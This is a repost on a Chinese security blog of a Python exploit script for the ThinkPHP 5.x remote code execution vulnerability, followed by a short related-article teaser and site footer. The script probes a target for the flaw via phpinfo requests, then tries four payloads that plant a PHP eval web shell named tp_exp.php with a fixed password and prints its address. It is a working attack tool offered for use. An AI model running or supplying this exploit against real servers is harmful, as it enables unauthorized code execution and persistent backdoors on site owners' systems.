ThinkPhp 5.x Rce

admin 2021年11月30日19:56:47ThinkPhp 5.x Rce已关闭评论117 views字数 2801阅读9分20秒阅读模式

# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email: [email protected]
# @Blog: https://96.mk/

import requests
import sys

def demo():
print(' _______ _ _ _ _____ _ _ _____ ')
print(' |__ __| | (_) | | | __ | | | | __ ')
print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
print(''' | | | '_ | | '_ | |/ / ___/| __ | ___/ ''')
print(' | | | | | | | | | | <| | | | | | | ')
print(' |_| |_| |_|_|_| |_|_|__| |_| |_|_| ')
print()
print('tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
print('tRemote command execution exploit.')
print('tVulnerability verification and getshell.')
print('tTarget: http://target/public')
print()
class ThinkPHP():
def __init__(self,web):
self.web = web
self.headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding" : "gzip, deflate",
"Content-Type" : "application/x-www-form-urlencoded",
"Connection" : "keep-alive"
}

def verification(self):
i = 0
s = 0
verifications = ['/?s=index/\thinkRequest/input&filter=phpinfo&data=1','/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
while True:
if i == len(verifications):
break
else:
url = self.web + verifications[i]
req = requests.get(url=url,headers=self.headers)
if 'phpinfo()' in req.text:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] There are vulnerabilities.")
print()
toshell = input("[*] Getshell? (y/n):")
if toshell == 'y':
self.getshell()
elif toshell == 'n':
sys.exit()
else:
sys.exit()
else:
print("[-] There are no vulnerabilities.")

def getshell(self):
getshells = [
'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
'?s=index/\think\templatedriver\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']
shell = self.web + '/tp_exp.php'
i = 0
s = 0
while True:
if i == len(getshells):
break
else:
url = self.web + getshells[i]
req = requests.get(url=url,headers=self.headers)
req_shell = requests.get(url=shell,headers=self.headers)
if req_shell.status_code == 200:
s = 1
break
else:
s = 0
i += 1
if s == 1:
print("[+] WebShell :%s PassWord :nicai4" % shell)
else:
print("[-] The vulnerability does not exist or exists waf.")

def main():
demo()
url = input("[*] Please input your target: ")
run = ThinkPHP(url)
run.verification()

if __name__ == '__main__':
main()

相关推荐: CVE-2021-40444分析报告

1 漏洞概述 2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 Vir…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日19:56:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ThinkPhp 5.x Rcehttp://cn-sec.com/archives/654956.html